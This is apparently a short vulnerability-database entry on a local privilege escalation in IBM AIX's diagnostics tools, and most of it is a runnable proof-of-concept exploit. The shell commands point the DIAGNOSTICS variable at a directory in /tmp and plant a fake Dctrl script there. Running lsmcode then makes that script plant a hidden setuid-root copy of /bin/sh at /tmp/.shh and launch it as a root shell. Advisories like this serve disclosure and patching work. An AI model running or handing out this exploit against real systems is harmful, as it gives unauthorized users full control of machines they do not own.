IBM AIX Diag Local Privilege Escalation Vulnerabilities

info
discussion
exploit
solution
references

IBM AIX Diag Local Privilege Escalation Vulnerabilities

The following proof of concept example is available:
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh